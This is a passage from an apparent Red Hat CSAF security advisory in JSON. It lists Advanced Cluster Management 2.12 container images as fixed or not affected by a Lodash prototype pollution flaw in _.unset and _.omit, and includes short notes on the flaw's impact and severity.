"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
